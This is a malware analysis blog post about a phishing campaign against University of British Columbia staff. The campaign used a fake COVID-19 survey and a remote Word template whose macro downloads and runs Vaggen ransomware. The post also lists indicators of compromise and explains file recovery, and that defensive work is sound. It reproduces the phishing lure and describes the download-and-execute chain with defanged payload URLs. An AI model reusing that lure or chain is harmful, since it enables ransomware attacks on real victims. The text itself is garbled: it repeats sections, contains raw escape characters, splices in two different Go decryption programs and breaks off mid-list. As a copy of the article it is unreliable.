3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3218 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3219 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3220 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3221 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3222 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
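The recovery described above, as an added example that is not code from the article or from the malware itself: a Go routine that parses the nonce | ciphertext | tag layout of a .VAGGEN file and decrypts it with the quoted 32-byte key using AES-256-GCM from the standard library. The makeSample helper only exists so the recovery routine can be exercised offline; the plaintext, the file name and the function names are constructed for this demonstration and are not taken from the sample.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"strings"
)

// Layout of a .VAGGEN file as described in the write-up:
//   [12-byte nonce][ciphertext][16-byte GCM tag]
// The key is the 32-byte value quoted in the article. It is reused for every
// file, which is exactly why recovery without the author's cooperation works.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	vaggenExt = ".VAGGEN"
	nonceLen  = 12
	tagLen    = 16
)

// newGCM builds the AES-256-GCM AEAD, with an explicit key-length check so a
// wrong-size key is reported differently from a corrupted file.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("AES-256 requires a 32-byte key, got %d bytes", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // 12-byte nonce and 16-byte tag by default
}

// makeSample produces an in-memory blob in the same layout from constructed
// plaintext (demonstration helper only). Passing the nonce as gcm.Seal's dst
// prepends it to ciphertext||tag, which yields the on-disk layout directly.
func makeSample(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// recoverVaggen parses a blob and returns the original content. GCM is
// authenticated, so a truncated file, a flipped byte or a wrong key all come
// back as an error instead of as silently wrong output.
func recoverVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceLen+tagLen {
		return nil, errors.New("blob shorter than nonce + tag: not a complete .VAGGEN file")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceLen], blob[nonceLen:]
	return gcm.Open(nil, nonce, sealed, nil)
}

// originalName undoes the rename step by stripping the appended extension.
func originalName(encryptedName string) string {
	return strings.TrimSuffix(encryptedName, vaggenExt)
}

func main() {
	key := []byte(vaggenKey)
	plaintext := []byte("constructed sample document contents") // constructed, not a victim file
	blob, err := makeSample(key, plaintext)
	if err != nil {
		panic(err)
	}
	got, err := recoverVaggen(key, blob)
	if err != nil {
		panic(err)
	}
	name := "report.docx" + vaggenExt // constructed file name
	fmt.Printf("%s -> %s: %q (match=%v)\n", name, originalName(name), got, bytes.Equal(got, plaintext))

	// A single flipped ciphertext byte must be rejected by the tag check.
	tampered := append([]byte(nil), blob...)
	tampered[nonceLen] ^= 0x01
	if _, err := recoverVaggen(key, tampered); err != nil {
		fmt.Println("tampered blob rejected:", err)
	}
}
```

Because the tag is verified before any plaintext is returned, a recovery tool built on this routine can safely walk a directory tree the way the malware's Walk callback did, write the decrypted bytes to the stripped file name, and delete the .VAGGEN copy only after Open succeeds; any file that fails authentication is left untouched for manual inspection.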
Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not. Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3256 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3257 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3258 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3259 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3260 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3261 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3262 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3263 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3264 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3265 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3266 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we have observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims in exchange for recovering their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without generating a number of false positives.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself contains no macro, only an attachedTemplate relationship pointing at the remote .dotm; Word fetches and loads that template, macros included, when the document is opened, which is why the lure passes macro-focused scanners.
That remote template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute Killar.exe
Checks the return value of Shell to determine whether the launch succeeded (on success, the return value is the task ID of the executed application)
If successful, sends an HTTP GET request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not, sends an HTTP GET request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to be alerted when a particular event occurs.
This can be very useful as an early warning system that an intruder has gained access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (such as the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encryption and renaming of the files is implemented as the callback passed to the standard Go library function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (a 32-byte key) in GCM mode.
The encryption routine is similar to the one demonstrated here.
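Because the key is hardcoded in the binary and the output layout is fixed (both are detailed in the next paragraphs: a 12-byte nonce, the ciphertext and the 16-byte GCM tag, under the key “du_tar_mitt_hjart_mina_pengarna0”), a recovery tool is short. The Go program below is an added example, not the malware's code or a Malwarebytes tool; it reproduces the described layout only to build its own test data and assumes that no additional authenticated data was passed to gcm.Seal, which the post does not mention.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"strings"
)

// Key recovered from the binary: 32 bytes, hence AES-256. The trailing "0"
// pads the Swedish phrase to exactly one AES-256 key length.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const nonceSize = 12 // standard GCM nonce, written at the start of the file
const tagSize = 16   // GCM tag appended by gcm.Seal

func newGCM() (cipher.AEAD, error) {
	block, err := aes.NewCipher([]byte(vaggenKey))
	if err != nil {
		return nil, err // only fails if the key is not 16, 24 or 32 bytes
	}
	return cipher.NewGCM(block)
}

// DecryptVaggen takes the raw contents of a .VAGGEN file laid out as
// nonce || ciphertext || tag and returns the plaintext. gcm.Open verifies the
// tag, so a truncated or tampered file is rejected instead of yielding garbage.
func DecryptVaggen(blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceSize], blob[nonceSize:]
	plain, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("GCM authentication failed (wrong key or corrupted file): %w", err)
	}
	return plain, nil
}

// SealLikeVaggen reproduces the described output layout with a random nonce.
// It exists only to build test data here; it is not the malware's code.
func SealLikeVaggen(plain []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to the nonce slice: exactly nonce||ct||tag.
	return gcm.Seal(nonce, nonce, plain, nil), nil
}

// RecoverFile decrypts path (ending in .VAGGEN) and writes the result next to
// it with the extension removed. It never touches the encrypted original and
// refuses to overwrite an existing file.
func RecoverFile(path string) (string, error) {
	if !strings.HasSuffix(path, ".VAGGEN") {
		return "", fmt.Errorf("%s does not carry the .VAGGEN extension", path)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	plain, err := DecryptVaggen(blob)
	if err != nil {
		return "", err
	}
	out := strings.TrimSuffix(path, ".VAGGEN")
	if _, err := os.Stat(out); err == nil {
		return "", fmt.Errorf("refusing to overwrite %s", out)
	}
	return out, os.WriteFile(out, plain, 0o600)
}

func main() {
	for _, p := range os.Args[1:] {
		if out, err := RecoverFile(p); err != nil {
			fmt.Fprintln(os.Stderr, p+":", err)
		} else {
			fmt.Println("recovered", out)
		}
	}
}
```

GCM's tag is what makes this safe to run blindly over a tree of .VAGGEN files: with the wrong key or a damaged file, gcm.Open fails and nothing is written, instead of producing garbage that silently replaces the only remaining copy. Since the key is the same for every victim, no contact with the attacker is needed.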
The key is hardcoded, and the 12-byte nonce is generated with CryptGenRandom. The file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content: because the same key is embedded in every copy of the binary, there is no per-victim key to retrieve from the attacker, and the GCM tag confirms a correct decryption before anything is written.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike with professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with the nice touch of adding canary tokens. It is unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

File hashes are SHA-256; URLs are defanged.

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
